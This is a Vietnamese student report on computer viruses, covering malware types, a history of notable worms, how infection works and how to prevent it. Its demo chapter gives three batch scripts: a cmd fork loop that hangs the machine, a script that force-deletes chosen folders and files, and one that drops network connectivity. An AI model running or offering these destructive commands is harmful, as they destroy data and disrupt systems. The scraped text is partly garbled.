Đang tải... (xem toàn văn)
Virus máy tính( thường được người sử dụng gọi tắt virus): những đoạn mã chương trình được thiết kế để tự nhân bản, sao chép chính nó vào các đối tượng lây nhiễm khác( ổ đĩa, máy tính,…)Virus máy tính từ khi ra đời cho đến nay luôn tận dụng những kỹ thuật tiên tiến của công nghệ thông tin, truyền thông cũng như lợi dụng những lổ hổng nguy hiểm trong các hệ thống tin học để trương ảnh hưởng của mình. Mặc dù việc sử dụng các thiết bị phần mềm bảo mật trở nên phổ biến, virus vẫn tiếp tục phát triển mạnh mẽ do giờ đây chúng thường được viết ra có mục đích rõ ràng, phục vụ một đối tượng cụ thể không ngừng cải tiến qua các phiên bản để đạt được phiên bản hiệu quả nhất.Virus máy tính từ khi ra đời đã trở thành, đã trở thành mối nguy hại đối với tất cả các hệ thống máy tính, mạng trên thế giới. Mặt khác, cũng không thể phủ nhận tính tích cực của virus máy tính, bởi virus máy tính chỉ có thể phát triển được dựa trên những sơ xuất của công nghệ, người sử dụng nên thông qua việc tìm hiểu về các cơ chế hoạt động của virus, các phương thức lây lan cũng như phá hoại của chúng ta có thể đưa ra các giải pháp cải thiện chất lượng, độ an toàn của phần mềm cũng như các hệ thống.
Mục lục LỜI CẢM ƠN Em xin chân thành gửi lời cảm ơn đến quý thầy cô trường Đại Học Tài Nguyên & Môi Trường Hà Nội tạo điều kiện cho chúng em hội thực hành, tiếp xúc để chúng em tránh vướng mắc bỡ ngỡ môi trường công việc thời gian tới Em xin chân thành cảm ơn thầy Nguyễn Đức Tồn, nhờ giúp đỡ tận tình bảo thầy từ lúc bắt đầu lúc kết thúc tập để chúng em hoàn thành thời hạn quy định tích lũy cho lượng tảng kiến thức quý báu Mặc dù cố gắng hoàn thành đề tài tốt thời gian kiến thức cịn có hạn nên em khơng thể tránh khỏi thiếu sót định, mong nhận cảm thông, chia sẻ tận tình đóng góp bảo q thầy cô bạn Hà Nội, ngày 11 tháng 11 năm 2021 LỜI NĨI ĐẦU Virus máy tính từ đời trở thành, trở thành mối nguy hại tất hệ thống máy tính mạng giới Mặt khác, khơng thể phủ nhận tính tích cực virus máy tính, virus máy tính phát triển dựa sơ xuất công nghệ người sử dụng nên thơng qua việc tìm hiểu chế hoạt động virus, phương thức lây lan phá hoại đưa giải pháp cải thiện chất lượng độ an toàn phần mềm hệ thống Tuy nhiên phát triển hệ virus máy tính năm gần gây hậu mà để khắc phục chúng phải tiêu phí lượng lớn thời gian tiền bạc Vì việc tìm hiểu phân tích virus máy tính điều cần thiết để bảo vệ máy tính liệu Và lý em chọn đề tài CHƯƠNG TỔNG QUAN VỀ LÝ THUYẾT Virus máy tính( thường người sử dụng gọi tắt virus) đoạn mã chương trình thiết kế để tự nhân chép vào đối tượng lây nhiễm khác( file, ổ đĩa, máy tính,…) Virus máy tính từ đời tận dụng kỹ thuật tiên tiến công nghệ thông tin truyền thông lợi dụng lổ hổng nguy hiểm hệ thống tin học để khuyếch trương ảnh hưởng Mặc dù việc sử dụng thiết bị phần mềm bảo mật trở nên phổ biến, virus tiếp tục phát triển mạnh mẽ chúng thường viết có mục đích rõ ràng, phục vụ đối tượng cụ thể không ngừng cải tiến qua phiên để đạt phiên hiệu 1.1 Phân loại phần mềm độc hại Có nhiều cách phân loại phần mềm độc hại định nghĩa chúng có đơi chút khác nhau: • Bugware: Các chương trình phần mềm hợp lệ thiết kế để thực số chức lỗi lập trình nên gây lỗi cho hệ thống sử dụng • Trojan horse: Các đoạn chương trình có hại cài có chủ định vào chương trình hợp lệ, tiến hành phá hoại, ăn cắp thơng tin người sử dụng v.v khơng có khả lây lan • Software bombs: Các đoạn mã có tính chất phá hoại giấu bí mật chờ thực hiện, phá hoại lần, khơng lây lan • Replicators: Các chương trình gần giống với virus, liên tục nhân làm cạn kiệt tài nguyên hệ thống khiến chương trình khác khơng hoạt động • Virus: Chương trình máy tính thiết kế để tự lây lan từ file tới file khác máy vi tính riêng lẻ, khơng có khả tự lây lan từ máy tính sang máy tính khác • Worm: Chương trình thiết kế để tự lây lan từ máy tính tới máy tính khác qua mạng • 1.2 Lịch sử hình thành phát triển virus máy tính Trên sở lý thuyết virus máy tính xuất từ lâu, năm 1949, John von Newman viết “Lý thuyết cấu phần tử tự hành phức tạp – Theory and Organization of Complicated Automata” nêu ý tưởng chương trình tự nhân Đến năm 1959, ba lập trình viên AT&T viết chương trình Core war có trang bị tính tự nhân tiêu diệt bảng mã đối phương, sau trở thành tính virus máy tính Sự phát triển virus nói riêng phần mềm độc hại nói chung chia làm bốn giai đoạn kéo dài từ năm 1979 đến Mỗi giai đoạn đại diện cho khuynh hướng công nghệ virus ln tận dụng triệt để cơng nghệ 1.2.1 Giai đoạn thứ (1979-1990) Những virus virus boot-sector lây hệ điều hành MS DOS Khoảng năm 1980 trở đi, số lượng virus tăng vọt với phát triển máy tính cá nhân Đại diện giai đoạn xét đến virus Brain xuất năm 1986 virus Lehigh xuất năm 1987 Sau thời gian ngắn bắt đầu xuất thuật ngữ “worm” phần mềm có khả tự lây lan qua mạng Năm 1987, worm Christma Exec có khả lây lan qua e-mail mainframe IBM, người sử dụng bị đánh lừa để thực thi virus nội dung email cho biết thực thi vẽ thơng Noel, worm có thực việc vẽ thông Noel lên đồng thời gửi tới người sử dụng khác nằm danh sách email nạn nhân Những người sử dụng tin tưởng nhận email từ người họ quen biết họ mở email Tháng 11 năm 1988, Robert Morris Jr viết worm Morris lây lan tới 6000 máy tính vài (khoảng 10% số máy Internet thời điểm đó) Tuy nhiên sau worm bị phát tiêu diệt lỗi lập trình tiến hành lây lại máy tính bị nhiễm từ trước, dẫn đến việc giảm tốc độ đáng kể máy tính nên dễ bị phát 1.2.2 Giai đoạn thứ hai (1990-1998) Giai đoạn thứ hai diễn khoảng năm 1990 đến 1998 đánh dấu nhiều hoạt động virus worm kỹ thuật tiên tiến virus có tác động mạnh mẽ lên trình phát triển worm Trong thời kỳ này, virus bắt đầu chuyển từ hệ điều hành DOS sang công hệ điều hành Windows, xuất virus macro, virus bắt đầu sử dụng kỹ thuật đa hình để ngụy trang tránh bị phát đặc biệt xu hướng sử dụng e-mail công cụ để phát tán Trong thời kỳ virus sử dụng dấu hiệu nhận dạng từ khóa nên dễ dàng bị phát phần mềm diệt virus tiến hành qt phân tích file Để đối phó, ban đầu virus sử dụng thuật tốn mã hóa để che dấu tồn mình, nhiên để thực việc virus phải xây dựng thủ tục mã hóa thủ tục giải mã có yếu điểm nên bị phần mềm diệt virus phát Khoảng năm 1989, virus sử dụng kỹ thuật ngụy trang đa hình xuất hiện, kỹ thuật phức tạp cho phép virus tự biến đổi để tránh bị cơng cụ dị tìm phát Cũng khoảng thời gian này, số hacker tạo cơng cụ phát triển có giao diện dễ sử dụng cho phép hacker tạo virus có tính lây lan phá hoại tương đối mạnh, sản phẩm đánh giá xuất sắc toolkit virus Anna Kournikova Virus giả làm ảnh dạng JPG ngơi quần vợt Anna Kournikova đính kèm theo e-mail Nếu đoạn VBScript thực hiện, e-mail chứa virus chép tới địa nằm sổ địa Outlook Năm 1995 đánh dấu xuất virus macro có tên gọi Concept, virus viết để lây nhiễm vào file normal.dot Microsoft Word sử dụng cho hệ điều hành Windows 95 Những virus macro có lợi dễ viết chạy nhiều platform khác Tuy nhiên, đa số người sử dụng biết cách bỏ tính thực macro Office virus bị tính phổ biến lợi 1.2.3 Giai đoạn thứ ba (1999-2000) Giai đoạn thứ ba kéo dài từ năm 1999 tới cuối năm 2000 đánh dấu phát triển mạnh mẽ trào lưu phát tán virus qua email Tháng năm 1999, sâu Happy99 lây qua e-mail với file đính kèm có tên Happy99.exe Khi file đính kèm thực hiện, bề ngồi hiển thị pháo hoa chào năm 1999 hình, bí mật sửa file WSOCK32 DLL với Trojan cho phép worm chèn vào tiến trình truyền thơng File WSOCK32.DLL ban đầu đổi tên thành WSOCK32.SKA Mỗi e-mail người sử dụng gửi chứa worm Tháng năm 1999, virus Melissa lây lan sang 100.000 máy tính giới ngày Tháng năm 1999, worm ExploreZip giả mạo giao diện file WinZip gắn vào email để lây lan Nếu thực hiện, hiển thị thơng báo lỗi, thao tác thật worm bí mật chép vào thư mục hệ thống Windows tự nạp vào Registry Nó tự gửi qua e-mail sử dụng Microsoft Outlook Exchange tới địa nằm hộp thư Nó theo dõi tất email đến tự trả lời người gửi với Đầu năm 2000, virus BubbleBoy xuất chứng minh máy tính bị lây nhiễm cách xem trước e-mail mà không cần phải mở email Nó tận dụng lỗ hổng bảo mật Internet Explorer cho phép tự động thực VB Script nhúng thân email Virus gửi tới e-mail với tiêu đề "BubbleBoy is back” nội dung email có chứa đoạn mã VBScript virus Nếu email đọc Outlook, script chạy cho dù email đọc chức “preview” Một file bổ sung vào thư mục khởi động Windows, máy tính bắt đầu khởi động lại, virus gửi tới tất địa email nằm Outlook Tháng năm 2000, worm Love Letter lây lan nhanh dạng e-mail với subject "I love you" file đính kèm có dạng text để lừa người sử dụng đọc thực đoạn VBScript Khi thực hiện, worm cài đặt vào thư mục hệ thống sửa đổi Registry để bảo đảm file chạy máy tính khởi động Love Letter lây lan sang nhiều kiểu file khác ổ đĩa cục thư mục dùng chung chia sẻ qua mạng Khi lây sang máy tính khác, Outlook cài đặt, worm gửi email có tới địa sổ địa Tháng 10 năm 2000, worm Hybris bắt đầu lây lan qua email theo kiểu đính kèm Khi thực hiện, sửa file WSOCK32 DLL để theo dõi q trình truyền thơng máy tính Với e-mail gửi đi, gửi cho người nhận Điều nguy hiểm có khả tự tải nâng cấp từ địa mạng 1.2.4 Giai đoạn thứ tư (2001 - ) Giai đoạn worm đại năm 2001 đến tận ngày Chúng có khả lây lan nhanh mức độ tinh vi cao Virus ngày xâm nhập cách bẻ gãy rào an toàn hệ điều hành hay chui vào chỗ hở phần mềm chương trình thư điện tử, từ lan tỏa khắp nơi theo nối kết mạng hay qua thư điện tử Ngày 12 tháng bảy năm 2001, sâu Code Red xuất bắt đầu khai thác lỗi tràn đệm MS IIS web server (mặc dù lối công bố ngày 18 tháng năm 2001) lây nhiễm cho 200.000 máy tính ngày chúng có lỗi chế tìm kiếm Cuối tháng 7, phiên thứ Code Red I (Code Red v2) sửa lỗi nên có khả lây lan nhanh, 14 lây nhiễm cho 359.000 Phần phá hoại Worm đồng loạt cơng website www.whitehouse.gov Sau lâu bắt đầu xuất worm có khả disable antivirus Klez Bugbear vào tháng 10 năm 2001, số worm khác tiến hành ghi lại thao tác bàn phím người sử dụng để gửi cho hacker Tháng năm 2003 xuất worm Blaster khai thác lỗi Windows DCOM RPC để lây lan, phần phá hoại worm cho phép công kiểu từ chối dịch vụ để công tới Microsoft Web site “windowsupdate.com” vào năm 2003 Năm 2004: Đánh dấu hệ virus worm Sasser Với virus người ta khơng cần phải mở đính kèm điện thư mà cần mở thư đủ cho xâm nhập vào máy Cũng may Sasser khơng hồn tồn hủy hoại máy mà 10 làm cho máy chủ trở nên chậm đơi làm máy tự khởi động trở lại Năm 2017: Vụ công WannaCry vào ngày 12/5/2017 tiếp tục phát tán WannaCry gọi WannaDecryptor 2.0, phần mềm độc hại mã độc tống tiền tự lan truyền máy tính sử dụng Microsoft Windows Vào tháng 5/2017, công không gian mạng quy mô lớn sử dụng đưa ra, tính tới ngày 15/5 gây lây nhiễm 230.000 máy tính 150 quốc gia Trong tương lai khơng xa, virus có thêm bước biến đổi khác, bao gồm điểm mạnh sẵn có (polymorphic, sasser hay cơng nhiều cách thức, nhiều kiểu) kết hợp với thủ đoạn khác phần mềm gián điệp Đồng thời công vào nhiều hệ điều hành khác không thiết nhắm vào hệ điều hành độc trường hợp Windows Và có lẽ virus khơng thay đổi phương thức cơng: lợi dụng điểm yếu máy tính chương trình 1.3 Cách thức hoạt động Cách thức hoạt động virus diễn giải khái quát sau - Các máy tính hoạt động thị dạng mã máy theo trình tự hợp lý để thực thi cơng việc Mã máy dãy số nhị phân việc lập trình trực tiếp mã máy nhức đầu, nên giới điện tốn thiết kế ngơn ngữ lập trình (như C, C++, Java, ) để người lập trình ứng dụng thảo chương ký hiệu tên gọi dễ nhớ, 10 11 sau dịch sang mã máy để máy thi hành Nếu lập trình - khơng hợp lý máy bị treo, khơng làm Kỹ thuật lập trình dẫn đến cơng việc xác định lặp lại nhiều lần thường tổ chức thành modul riêng gọi "trình con", ngơn ngữ lập trình gọi routine hay subroutine, cần thực công việc vốn ấn định cho routine trình chạy thực lệnh gọi đến routine để thực thi Lệnh call có tham số địa routine nhớ, thực thi lệnh call chuyển địa vào trỏ lệnh CPU trao quyền chạy cho routine Cấu trúc routine có điểm vào nơi bắt đầu, điểm trả lại điều khiển cho trình gọi sau hồn - tất cơng việc Virus viết dạng routine, thực sửa tham số địa số lệnh call trỏ đến địa nó, kết thúc virus chuyển điều khiển đến routine vốn gọi trình Những virus làm gói dãy mã lệnh virus, có kỹ tự lây nhiễm, tùy thuộc - trình độ người viết virus Sự tương tự mã trình với mã DNA sinh học, hoạt động virus tin học, dẫn đến tên gọi "virus" Dẫu khác bản, virus sinh học phát tác đồng thời tế bào, virus tin học phát tác gọi với tư cách mã lệnh Nếu nạp virus tin học với tư cách liệu vào nhớ để xem khơng làm Nó cho thấy vai trị cảnh giác click vào file có virus Trong thiết kế máy tính địa routine bố trí sau: Địa routine máy chứa BIOS sau khởi động đặt nhớ nơi gọi "bảng địa Interrupt" 11 12 Khởi động ổ đĩa (mềm, cứng, USB, ) đặt boot sector, địa file ổ đĩa đặt bảng FAT đĩa Virus lục lọi bảng để tìm cách thâm nhập thích hợp Trước virus thường ngắn, gắn thêm vào tệp mã Ngày virus lưu trữ phần thân dạng file riêng ẩn dấu đĩa mạng Virus phải cố tìm lỗ hổng bảo mật để xâm nhập, việc tìm lỗ hổng địi hỏi khả phân tích mã lệnh phức tạp Một số virus xuất dạng chương trình tự lập, thực chất phần mềm phá hoại, thực đánh lừa cách biểu tượng hay đường link để người thiếu cảnh giác click vào 1.4 Hình thức lây nhiễm Virus lây nhiễm nhiều cách thức khác ngày tinh vi Dưới đường lây lan phổ biến virus máy tính: - Thiết bị gắn ngồi: Virus lây lan vào máy tính thơng qua USB, điện - thoại, đĩa cứng di động thiết bị giải trí kỹ thuật số Lây nhiễm qua mạng internet: • Tải file phần mềm: Khi tải file phần mềm mạng máy tính, file bị nhiễm virus khả cao lây lan sang máy tính • Lây qua email: Email cách thức truyền thống để liên lạc, trao đổi với ngày Virus tìm tồn email liên lạc danh sách tự động gửi mail hàng loạt Và người nhận mail click vào file đính kèm, link liên kết, hay nội dung email virus nhanh chóng lây lan theo cấp số nhân • Quảng cáo trực tuyến: Nếu không may click vào quảng cáo có chứa mã độc, lây lan virus vào máy tính Những kẻ cơng mạng chèn mã độc vào quảng cáo cài đặt quảng cáo trang web để dụ dỗ người dùng click vào • Trang web độc hại 12 13 • Link, file lừa đảo: Những loại link, file xuất đâu internet, từ trang web, mạng xã hội, ứng dụng trò - chuyện Virus lây qua Bluetooth, NFC( Near-Field Communications): Nếu chia sẻ liệu với thiết bị khác qua kết nối không dây mobile Bluetooth, NFC thiết bị bị nhiễm virus Vì tắt hết kết nối không sử - dụng Virus lây qua lỗ hổng bảo mật, backdoor hệ điều hành: Thực chất xét chi tiết cách thức lây nhiễm thơng qua đường Tức hệ điều hành có backdoor, có lỗ hổng bảo mật hacker cần tiếp cận với máy tính thơng qua thiết bị gắn ngoài, liên kết link, file độc hại phát tán virus 1.5 Một số cách phòng chống virus 1.5.1 Phòng tránh virus lây lan qua thiết bị ngoại vi Virus dễ dàng xâm nhập vào máy tính từ thiết bị ngoại vi như: USB, thẻ nhớ, ổ cứng di động,…khi thực thao tác chép liệu Vậy nên trước cắm thiết bị ngoại vi vào máy tính, cần qt virus trước sau click vào để mở liệu Bên cạnh mở file, thay nhấp đúp, nên click chuột phải chọn open 1.5.2 Phịng tránh virus file đính kèm tải từ internet Có nhiều trường hợp, người dùng phải lên tải file tài liệu máy để phục vụ cho mục đích sử dụng Khi tải file 13 14 từ internet máy, cần phải truy cập vào trang web có độ tin tưởng cao, nguồn gốc rõ rang File trang kiểm duyệt nên khơng bị đính kèm virus gây hại bên cạnh đó, khơng nên click vào đường link không rõ rang để tránh virus xâm nhập phát tán 1.5.3 Phòng tránh virus lây nhiễm qua thư điện tử Hiện nay, virus đính kèm theo thư điện tử ngày trở nên phổ biến Những virus đính kèm qua tư điện tử thường loại có khả đánh cắp thơng tin diện rộng khó kiểm sốt, gây mối nguy hại khơng lường Để phịng tránh virus lây lan, nên kiểm tra cẩn thận email từ địa lạ có đính kèm đường link khơng rõ ràng 1.5.4 Sử dụng phần mềm diệt virus Bảo vệ máy tính cách trang bị thêm phần mềm diệt virus có khả nhận biết nhiều loại virus máy tính liên tục cập nhật liệu để phần mềm ln nhận biết virus mới, ví dụ như: Bkav, D32,CMC, Norton-Symantec, Kaspersky, Avira, AVG, ESET, Avast!, BitDef ender, Microsoft Security Essentials, Windows Defender (từ Windows trở đi) 1.5.5 Sử dụng tường lửa cá nhân Khi sử dụng tường lửa, thông tin vào máy tính kiểm sốt cách vơ thức có chủ ý Nếu phần mềm độc hại cài vào máy tính có hành động kết nối Internet tường lửa cảnh báo giúp người sử dụng loại bỏ vơ hiệu hố chúng 14 15 Tường lửa giúp ngăn chặn kết nối đến không mong muốn để giảm nguy bị kiểm sốt máy tính ngồi ý muốn cài đặt vào chương trình độc hại hay virus máy tính 1.5.6 Cập nhật vá lỗi hệ điều hành Hệ điều hành Windows luôn bị phát lỗi bảo mật thơng dụng nó, tin tặc lợi dụng lỗi bảo mật để chiếm quyền điều khiển phát tán virus phần mềm độc hại Người sử dụng cần cập nhật vá lỗi Windows thông qua trang web Microsoft Update Windows Update Cách tốt đặt chế độ nâng cấp tự động Windows Tính hỗ trợ Windows mà Microsoft nhận thấy chúng hợp pháp Ngồi vận dụng kinh nghiệm sử dụng máy tính để phát hoạt động khác thường máy tính, kiểm sốt ứng dụng hoạt động, loại bỏ số tính tự động hệ điều hành quét virus trực tuyến Bảo vệ liệu máy tính cách lưu liệu theo chu kỳ, tạo liệu phục hồi cho toàn hệ thống CHƯƠNG THỬ NGHIỆM CHƯƠNG TRÌNH MƠ PHỎNG TẠO VIRUS MÁY TÍNH 2.1 Ví dụ tạo virus làm treo máy Tạo virus làm treo máy notepad 15 16 • Mơ tả code - @echo off :x start cmd %loop% goto x Hình 2.1: Mơ chương trình virus làm treo máy Kết quả: Máy tính có tượng bị treo 16 17 Hình 2.2: Kết chương trình 2.2 Ví dụ tạo virus xóa liệu Tạo virus xóa liệu định notepad 17 18 • Mơ tả code @echo off echo Ban co yeu minh khong? (Chi can tra loi co hoac khong) set /p yeu= if %yeu%==co goto x if %yeu%==khong goto y :x echo Minh cung yeu ban ahihi echo Hen gap lai :pp pause exit :y echo Hmm ok echo May tinh ban se bi hack giay nua timeout rd /s /q (đường dẫn thư mục cần xóa) del /s /f /q (đường dẫn tệp tin cần xóa)\*.* cls echo X=MsgBox("Ban da bi hack",24+24,"Xin chuc mung!!!") enjoy >>vbs start enjoy.vbs Hình 2.3: Mơ chương trình tạo virus xóa liệu Kết quả: Virus chạy thành cơng xóa tồn liệu định 18 19 Hình 2.4: Kết chương trình 2.3 Ví dụ tạo virus phá kết nối mạng Tạo virus phá kết nối mạng • Mô tả code @echo off ipconfig /release echo X=MsgBox("Ban da bi hack",24+24,"Xin chuc mung!!!") >>enjoy.vbs start enjoy.vbs Hình 2.5: Mơ chương trình virus phá kết nối mạng Kết quả: Virus chạy thành công chặn kết nối mạng máy tính 19 20 Kết luận Kết đạt - - Tìm hiểu nghiên cứu lý thuyết: • Phân loại • Lịch sử hình thành phát triển • Các thức hoạt động • Hình thức lây nhiễm • Một số cách phòng chống virus Thử nghiệm chương trình mơ tạo virus máy tính Nhận xét …………………………………………………………………………… ………………………………………………………………………………… ………………………………………………………………………………… ………………………………………………………………………………… ………………………………………………………………………………… ………………………………………………………………………………… ………………………………………………………………………………… ………………………………………………………………………………… ………………………………………………………………………………… ………………………………………………………………………………… ………………………………………………………………………………… ………………………………………………………………………………… ………………………………………………………………………………… ………………………………………………………………………………… ………………………………………………………………………………… ………………………………………………………………………………… ………………………………………………………………………………… ………………………………………………………………………………… ………………………………………………………………………………… 20 21 ………………………………………………………………………………… Tài liệu tham khảo [http://www.wikipedia.org] [https://www.bkav.com.vn/] [Ngô Anh Vũ (2002), Virus tin học huyền thoại thực tế, NXB Thành Phố Hồ Chí Minh] [Anand Mylavarapu, Anil Chukkapalli, Source code analysis and performance, Computer Science Department, St Cloud State University] [Cynthia Wong, Stan Bielski, Jonathan M McCune, Chenxi Wang, A Study of Mass-mailing Worms, Carnegie Mellon University] [David Harley, Robert Slade, Urs Gattiker (2001), Viruses Revealed, McGraw Hill] 21